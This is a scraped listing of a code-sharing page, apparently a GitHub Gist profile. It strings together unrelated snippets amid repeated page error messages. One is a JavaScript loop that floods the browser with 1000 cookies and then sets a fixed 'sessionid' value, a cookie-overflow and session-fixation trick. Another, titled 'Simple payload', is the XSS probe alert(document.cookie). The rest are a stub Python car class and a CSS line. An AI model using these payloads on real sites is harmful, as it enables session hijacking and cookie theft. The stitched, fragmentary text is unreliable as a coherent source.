Skip to content

Instantly share code, notes, and snippets.

Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
for (let i=0;i<1000;i++) {
document.cookie = "cookie"+i+"=overflow";
}
document.cookie = "sessionid=222"
class Auto:
auto_count = 0
user_car = []
cars = []
check_exist = False
def __init__(self, model,year, price):
self.model = model
self.year = year
self.price = price
Auto.auto_count += 1
@LaRevoltage
LaRevoltage / test.js
Created December 16, 2022 22:35
Simple payload
alert(document.cookie);
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
circle {fill: orange }
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.